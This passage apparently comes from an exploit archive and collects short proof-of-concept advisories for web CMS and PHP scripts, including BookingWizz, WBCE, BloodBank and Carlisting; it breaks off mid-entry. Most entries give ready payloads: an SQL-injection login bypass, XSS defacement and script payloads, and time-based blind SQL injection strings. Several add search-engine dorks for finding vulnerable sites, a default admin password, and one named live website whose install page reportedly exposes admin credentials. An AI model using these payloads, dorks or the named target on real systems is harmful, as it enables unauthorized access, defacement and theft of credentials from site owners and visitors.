<pre><code>&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />&#124; # Title : Business Website CMS v1.9 Auth Bypass Vulnerability &#124;<br />&#124; # Author : indoushka &#124;<br />&#124; # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) &#124; <br />&#124; # Vendor : https://www.codester.com/items/6806/the-company-business-website-cms &#124; <br />&#124; # Dork : &quot;&#169; &#124; Morkocbilisim&quot; &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /><br />poc :<br /><br />&#91;+&#93; Dorking İn Google Or Other Search Enggine.<br /><br />&#91;+&#93; User &amp; pass : 1&#39; or 1&#61;1 -- -<br /><br />&#91;+&#93; http://127.0.0.1/thecompany/admin/production/<br /><br />Greetings to :&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />jericho &#42; Larry W. Cashdollar &#42; shadow_00715 &#42; LiquidWorm &#42; Hussin-X &#42; D4NB4R &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /></code></pre>

<pre><code>&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />&#124; # Title : brsisCMS v1.0.2 XSS Vulnerability &#124;<br />&#124; # Author : indoushka &#124;<br />&#124; # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) &#124;<br />&#124; # Vendor : http://www.brsis.com.br/ &#124;<br />&#124; # Dork : &quot;Produzido por Brsis&quot; &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /><br /><br />poc :<br /><br /><br />&#91;+&#93; Dorking İn Google Or Other Search Enggine .<br /><br />&#91;+&#93; use Payload : &lt;marquee&gt;&lt;font color&#61;lime size&#61;32&gt;Hacked by indoushka&lt;/font&gt;&lt;/marquee&gt;<br /><br />&#91;+&#93; http://127.0.0.1/.jj.ind.br//contato.php?tipo_contato&#61;administracao%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color&#61;lime%20size&#61;32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /> <br />Greetings to :&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />jericho &#42; Larry W. Cashdollar &#42; brutelogic&#42; shadow_00715 &#42;9aylas&#42;djroot.dz&#42;LiquidWorm&#42;Hussin-X&#42;D4NB4R &#42;ViRuS_Ra3cH &#42;yasMouh&#42; CraCkEr &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /></code></pre>

<pre><code>&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />&#124; # Title : Bloly v1.3 Sql Injection Vulnerability &#124;<br />&#124; # Author : indoushka &#124;<br />&#124; # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit) &#124;<br />&#124; # Vendor : http://www.bloly.com/download.php &#124;<br />&#124; # Dork : Bloly v1.3 by SoftCab Inc &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /><br />poc :<br /><br />&#91;+&#93; Dorking İn Google Or Other Search Enggine .<br /><br />&#91;+&#93; Use Payload : index.php?user&#61;1<br /><br />&#91;+&#93; http://127.0.0.1/s56li90.freefr/perso/blog-btp/index.php?user&#61;1 &lt;&#61;&#61;&#61;&#61; inject her<br /><br />Greetings to :&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />jericho &#42; Larry W. Cashdollar &#42; shadow_00715 &#42; LiquidWorm &#42; Hussin-X &#42; D4NB4R &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /></code></pre>

<pre><code>&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />&#124; # Title : BookingWizz v5.5 sensitive information disclosure Vulnerability &#124;<br />&#124; # Author : indoushka &#124;<br />&#124; # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) &#124; <br />&#124; # Vendor : https://codecanyon.net/item/booking-system/87919?s_rank&#61;9 &#124; <br />&#124; # Dork : &quot;BookingWizz v5.5&quot; &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /><br />poc :<br /><br /><br />&#91;+&#93; Dorking İn Google Or Other Search Enggine.<br /><br />&#91;+&#93; Use Payload : /install.php<br /><br />&#91;+&#93; When you add install file they show you the real user and pass for admin panel.<br /><br />&#91;+&#93; https://www.avignongourmetours.com/booking/install.php<br /><br /><br />Greetings to :&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /> &#124;<br />jericho &#42; Larry W. Cashdollar &#42; brutelogic&#42; hyp3rlinx&#42; 9aylas &#42; shadow_00715 &#42; LiquidWorm&#42; &#124; <br /> &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /></code></pre>

<pre><code># Exploit Title: WBCE - Stored XSS<br /># Date: 07/2023<br /># Exploit Author: Andrey Stoykov<br /># Version: 1.6.1<br /># Tested on: Windows Server 2022<br /># Blog: http://msecureltd.blogspot.com<br /><br /><br />Steps to Exploit:<br /><br />1. Login to application<br />2. Browse to following URI &quot;http://host/wbce/admin/pages/intro.php&quot;<br />3. Paste XSS payload &quot;TEST&quot;&gt;&lt;img src&#61;x onerror&#61;alert(1)&gt;&quot;<br />4. Then browse to settings &quot;Settings-&gt;General Settings-&gt;Enable Intro<br />Page-&gt;Enabled&quot;<br /><br /></code></pre>

<pre><code>&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />&#124; # Title : BM IT CMS v1.0 Insecure Settings Vulnerability &#124;<br />&#124; # Author : indoushka &#124;<br />&#124; # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) &#124; <br />&#124; # Vendor : https://www.bmitsolution.in &#124; <br />&#124; # Dork : &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /><br />poc :<br /><br /><br />&#91;+&#93; Dorking İn Google Or Other Search Enggine.<br /><br />&#91;+&#93; user : admina : Admin &amp; pass : admin&#64;123<br /><br />&#91;+&#93; https://www/127.0.0.1/grdmaloutcom/admin/login.php &lt;&#61;&#61;&#61;&#61;&#124; Login<br /><br />Greetings to :&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br />jericho &#42; Larry W. Cashdollar &#42; brutelogic&#42; shadow_00715 &#42;9aylas&#42;djroot.dz&#42;LiquidWorm&#42;Hussin-X&#42;D4NB4R &#42;ViRuS_Ra3cH &#42;yasMouh&#42; CraCkEr &#124;<br />&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;&#61;<br /></code></pre>

<pre><code># Exploit Title: Travelable 1.0 - Stored XSS<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: travelmate.com<br /># Vendor Homepage: https://www.codester.com/items/43963/travelable-trek-management-solution<br /># Software Link: https://travel.codeswithbipin.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br />## Description<br /><br />Allow Attacker to inject malicious code into website, give ability to steal sensitive<br />information, manipulate data, and launch additional attacks.<br /><br /><br /><br />Path: /&#91;random-number&#93;/comment<br /><br />POST parameter &#39;comment&#39; is vulnerable to XSS<br /><br />-----------------------------------------------------------<br />POST /&#91;random-number&#93;/comment HTTP/2<br /><br /><br />_token&#61;10Mh1zuuVXB1iH3QsrEOqpWGOXogEv38WPwqGtv6&amp;name&#61;cracker+infosec&amp;email&#61;cracker%40infosec.com&amp;phone&#61;%2B96171951951&amp;comment&#61;&#91;XSS Payload&#93;<br />-----------------------------------------------------------<br /><br /><br /><br />## Steps to Reproduce:<br /><br /><br />1. Surf as a (Guest User)<br />2. Go to &#91;Tour Packages&#93; on this Path: https://website/packages<br />3. Choose any package and click &#91;Explore&#93; Path: https://website/package/6<br />4. Scroll Down to the &#91;Comments&#93; section<br />5. Inject your XSS Payload in &#91;Comment Box&#93;<br />6. Click on &#91;Submit&#93;<br /><br />7. Every visitor to the page where you inject your &#91;XSS Payload&#93; - Path: https://website/package/6<br />8. XSS will fire and execute on his browser.<br /><br /><br /><br />&#91;-&#93; Done<br /></code></pre>

<pre><code># Exploit Title: BloodBank 1.1 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/bloodbank/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /><br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company&#39;s reputation.<br /><br /><br /><br />Path: /bloodbank/search<br /><br />POST parameter &#39;country&#39; is vulnerable to SQL Injection<br />POST parameter &#39;city&#39; is vulnerable to SQL Injection<br />POST parameter &#39;blood_group_id&#39; is vulnerable to SQL Injection<br /><br /><br />-----------------------------------------------------------<br />POST /bloodbank/search HTTP/2<br /><br />country&#61;&#91;SQLI&#93;&amp;city&#61;&#91;SQLI&#93;&amp;blood_group_id&#61;&#91;SQLI&#93;&amp;form_search&#61;Search+Donor<br />-----------------------------------------------------------<br /><br /><br />---<br />Parameter: country (POST)<br /> Type: time-based blind<br /> Title: MySQL &gt;&#61; 5.0.12 time-based blind (query SLEEP)<br /> Payload: country&#61;123&#39;XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR&#39;Z&amp;city&#61;123&amp;blood_group_id&#61;2&amp;form_search&#61;Search+Donor<br /><br />Parameter: city (POST)<br /> Type: time-based blind<br /> Title: MySQL &gt;&#61; 5.0.12 time-based blind (query SLEEP)<br /> Payload: country&#61;123&amp;city&#61;123&#39;XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR&#39;Z&amp;blood_group_id&#61;2&amp;form_search&#61;Search+Donor<br /><br />Parameter: blood_group_id (POST)<br /> Type: time-based blind<br /> Title: MySQL &gt;&#61; 5.0.12 time-based blind (query SLEEP)<br /> Payload: country&#61;123&amp;city&#61;123&amp;blood_group_id&#61;(SELECT(0)FROM(SELECT(SLEEP(9)))a)&amp;form_search&#61;Search+Donor<br />---<br /><br /><br /><br />&#91;-&#93; Done<br /></code></pre>

<pre><code># Exploit Title: BloodBank 1.1 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 15/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/bloodbank/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim&#39;s session token or login credentials<br /><br /><br /><br />Path: /bloodbank/page.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/bloodbank/page.php/jr88z&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;h6n9w?slug&#61;blog&amp;page&#61;2<br /><br /><br /><br />&#91;-&#93; Done<br /></code></pre>

<pre><code># Exploit Title: Carlisting 1.6 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 16/07/2023<br /># Vendor: phpscriptpoint<br /># Vendor Homepage: https://phpscriptpoint.com/<br /># Software Link: https://demo.phpscriptpoint.com/carlisting/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim&#39;s session token or login credentials<br /><br /><br /><br />Path: /carlisting/search.php<br /><br />GET parameter &#39;country&#39; is vulnerable to RXSS<br />GET parameter &#39;state&#39; is vulnerable to RXSS<br />GET parameter &#39;city&#39; is vulnerable to RXSS<br /><br /><br 